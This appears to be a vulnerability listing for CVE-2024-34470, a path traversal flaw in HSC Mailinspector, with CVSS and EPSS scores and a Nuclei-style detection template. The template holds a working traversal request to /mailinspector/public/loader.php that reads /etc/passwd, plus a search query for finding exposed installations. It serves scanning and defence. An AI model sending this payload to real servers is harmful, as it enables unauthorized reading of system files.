CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
EPSS
Percentile
21.9%
An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
id: CVE-2024-34470
info:
name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
author: topscoder
severity: high
description: |
An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
reference:
- https://github.com/osvaldotenorio/CVE-2024-34470
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-34470
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
epss-score: 0.00043
epss-percentile: 0.0866
metadata:
verified: true
max-request: 2
fofa-query: "mailinspector/public"
tags: cve,cve2024,lfi,mailinspector,hsc
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/mailinspector/login.php"
host-redirects: true
matchers:
- type: word
part: body
words:
- "Licensed to HSC TREINAMENTO"
- method: GET
path:
- "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022051184fed9b9a4b1966d32d775675ae1770f24224d547667500500ad3177f5476022100fc9e3a62f08e8debfd9a15e004208573ed4273bfd4d6f2d48e09f8a46bcff1ce:922c64590222798bb761d5b6d8e72950